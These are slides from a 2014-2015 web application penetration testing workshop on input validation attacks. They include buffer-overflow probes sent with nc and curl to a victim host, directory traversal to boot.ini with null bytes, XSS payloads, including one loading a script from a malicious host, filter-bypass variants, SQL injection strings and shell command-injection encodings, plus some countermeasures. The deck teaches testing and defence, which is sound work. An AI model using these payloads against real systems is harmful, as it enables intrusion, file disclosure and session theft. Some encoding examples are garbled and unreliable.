2. INPUTVALIDATION ATTACKS
submit data which the application does not expect to receive
Sanity check?
tries to ensure that the data is useful
Validation routines?
Length check
Content check
Checksum
How to figure out all of validation checks in an application?
How to do all of validation checks in an application?
Web appliation penetration testing worksop - Mohsen ahmadi _ 2014-2015
3. CLIENT-SIDEVS. SERVER-SIDE
Why JavaScript?
simple to implement
widely supported betweenWeb browsers
move a lot of processing from theWeb server to the end-user’s system
Defeats?
What if disable JavaScript?
Using proxy on local
Web appliation penetration testing worksop - Mohsen ahmadi _ 2014-2015
5. EFFECTS
Generating Informational Error
SQL errors reveals table, column names
Directory path disclosure
ObtainingArbitrary DataAccess
Enumerating, creating, deleting users with anonymous
ObtainingArbitrary Command Execution
SQL injection attacks
System commands like listing directories, coping files
Cross-Site or Embedded Scripting
Target users than web server, application
Web appliation penetration testing worksop - Mohsen ahmadi _ 2014-2015
6. FIND POTENTIALTARGETS
Every GET, POST request is fodder for input validation attacks
What is attack vector?
Altering arguments from FORM request, application itself
Most prone to attack input fields?
Login Name, Password,Address, Phone Number, Credit Card Number, and Search
Every variable in the GET or POST request can be attacked
Web appliation penetration testing worksop - Mohsen ahmadi _ 2014-2015
7. BYPASSING CLIENT-SIDEVALIDATION
Why using JavaScript?
Put dynamic content to pages
Input validation
Bypass JavaScript using:
Local proxy likeAchilles, Paros, burp suite
Firewall
Pop-up blocker add-ons
Cookie manager
Web appliation penetration testing worksop - Mohsen ahmadi _ 2014-2015
9. BUFFER OVERFLOW
Create payload for attack:
Perl –e ‘print “a” x 50’
Use Perl, netcat
wrap the Perl line in back ticks and replace the argument
echo –e "GET /login.php?user=`perl –e 'print "a" x 500'`nHTTP/1.0nn" | nc –vv
www.victim.com 80
For HTTPS
curl https://www.victim.com/login.php?user=`perl –e 'print "a" x 500'`
Web appliation penetration testing worksop - Mohsen ahmadi _ 2014-2015
10. NTOMAX
Script Format
host:192.168.0.1,22,100,500,4000,250,0,2,true,true,true,false
lc:GET /login.php?user=* HTTP/1.0
Host: IP, port, min, max, timeout, delay, pause, retnum, reopen, norecv, verbose, trial
Loop command: each instance of an asterisk replaces with a string of 400*‘N’
ntomax /s < script.txt > results.txt
Web appliation penetration testing worksop - Mohsen ahmadi _ 2014-2015
11. DEEP ANALYSIS OF FEATURES
Additional host parameters:
timeout - ms to wait for socket response - default = 0
delay - ms to wait before sending commands - default = 250
pause - ms to wait before receiving - default = 0
retnum - number of LF/CR's to end buffer - default is one
reopen -T/F reopen connection before each command
norecv -T/F no receive after initial connect - default is off
verbose -T/F verbose output - off by default
trial -T/F display buffer w/o sending
Web appliation penetration testing worksop - Mohsen ahmadi _ 2014-2015
12. CANONICALIZATION (DOT-DOT-SLASH)
Attack vector:
access system files outside of theWeb document root
When attack happen?
Parse file from server
Using template files
How escape document root directory?
../../../../../../../../../boot.ini
salvation?
limit the types of files that it is supposed to view
Web appliation penetration testing worksop - Mohsen ahmadi _ 2014-2015
13. PUTTINGTHE DOTTO WORK
Suppose an application is parsing file contents
what happens if we rename the file to something that we know does not exist?
full installation path of the application used in directory traversal attacks
Null byte character
/servlet/webacc?user.html=gor-gor
File does not exist: c:Novelljavaservletscomnovellwebaccesstemplates/gor-
gor/login.htt
/servlet/webacc?user.html=../../../../../../../boot.ini%00
%00 ~ URL encoded null byte character
Web appliation penetration testing worksop - Mohsen ahmadi _ 2014-2015
14. NAVIGATINGWITHOUT DIRECTORY LISTINGS
explore the terrain without a map!
The first step is to find out where the actual directory root begins
enumerating files on IIS
By default;Topmost directory is inetpub
Adding directory traversal to /inetpub/wwwroot/default.asp
../../../../../../../../../../??
Find other directories on server by failure and success
Web appliation penetration testing worksop - Mohsen ahmadi _ 2014-2015
15. STEPSTO ENUMERATING
Examine error codes: 404/ 403
Find the root: drive letter, root
Move down theWeb document root
Find common directories: /tmp, /temp, /backups, /downloads
Try to access directory names: use listed directory contents
For improving success in directory traversal attacks you should know about
configurations, directories
Web appliation penetration testing worksop - Mohsen ahmadi _ 2014-2015
16. COUNTERMEASURES & MITIGATIONS
Remove all dots from user-input, parameters
Catch other representations of dots (0x2e) from parser engine
Remove path information using regular expression
Secure file system permissions, ACL
Limit server access to file, folders behind web root directory
Place configuration files behind document root directory
Web appliation penetration testing worksop - Mohsen ahmadi _ 2014-2015
17. SCRIPT ATTACKS
include any HTML-formatted strings to an application that subsequently renders
those tags
1. User entering <script> tags into a form field
2. user-submitted contents of that field are redisplayed
3. Interpreting tag as JavaScript directive rather than literal value
Two prerequisites:
the application must accept user input
the application must redisplay the user input
Web appliation penetration testing worksop - Mohsen ahmadi _ 2014-2015
18. COUNTERMEASURE
Handling angle brackets using HTML encoded values
User searches for <i>test</i> in search bar
At vulnerable scenario:
<b><i>test</i></b>
At secure scenario:
<b><i>test</i></b>
Web appliation penetration testing worksop - Mohsen ahmadi _ 2014-2015
19. XSS (CROSS SITE SCRIPTING)
place malicious code, usually JavaScript, in locations where other users see it
Common scenarios:
Steals cookies: allow the attacker to impersonate the victim
social engineering attack: trick the victim into divulging his or her password
Test for XSS:
<script>document.write(document.cookie)</script>
<script>alert('Salut!')</script>
<script src="http://www.malicious-host.foo/badscript.js"></script>
Web appliation penetration testing worksop - Mohsen ahmadi _ 2014-2015
21. COUNTERMEASURE
turn all angle brackets into their HTML-encoded equivalents
< ~ <
> ~ >
<script>
Limit input fields to the minimum possible
Inclusive regular expression than exclusive
<scrscriptipt>: bypass for replacing with null regex
<scr%69pt>
<ScRiPt>
<a href=“javascript:code”></a>
Check for presence of a positive is better rather than absence of a negatives
Web appliation penetration testing worksop - Mohsen ahmadi _ 2014-2015
22. BOUNDARY CHECKING
Generate informational errors by swapping out the boundaries
errors they generate can reveal useful information about the application or the
server; but you can’t get command execution
Checklist for vulnerability:
Boolean
String
Numeric
Web appliation penetration testing worksop - Mohsen ahmadi _ 2014-2015
23. MANIPULATINGTHE APPLICATION
Special directives
Debug=1: reveals more informational errors about back-end DBMS
%3f.jsp: directory listing in apache tomcat 3.2.x, Jrun
?openDocument ~ ?editDocument: Lotus domino servers
Htsearch CGI: -c command-line argument reading configuration file
Web appliation penetration testing worksop - Mohsen ahmadi _ 2014-2015
24. SQL INJECTION AND DATA STORE ATTACKS
Or+1=1
Single quote, tick mark, apostrophes
Error might you see during injection test:
You have an error in your SQL syntax
many SQL injection tests will reveal errors in files that do not access databases
Web appliation penetration testing worksop - Mohsen ahmadi _ 2014-2015
25. COMMAND EXECUTION
Run arbitrary commands on server
Types of bypassing execution flow on shell
%0a ~ new line character: analyze.sh?%0a/bin/ls%0a
Check for arbitrary variables can passed to server: analyze.sh?-h
%7c ~ pipe: chain UNIX commands on shell
%3b ~ semicolon: separate commands on single command line
%26 ~ ampersand: delimiter for arguments on the URL
Know your environment in command execution attacks
Web appliation penetration testing worksop - Mohsen ahmadi _ 2014-2015
27. TOPVECTORS FOR INPUTVALIDATION
Each argument of a GET request
Each argument of a POST request
Forms (e-mail address, home address, name, comments)
Search fields
Cookie values
Browser environment values (User agent, IP address, Operating System, etc.)
Web appliation penetration testing worksop - Mohsen ahmadi _ 2014-2015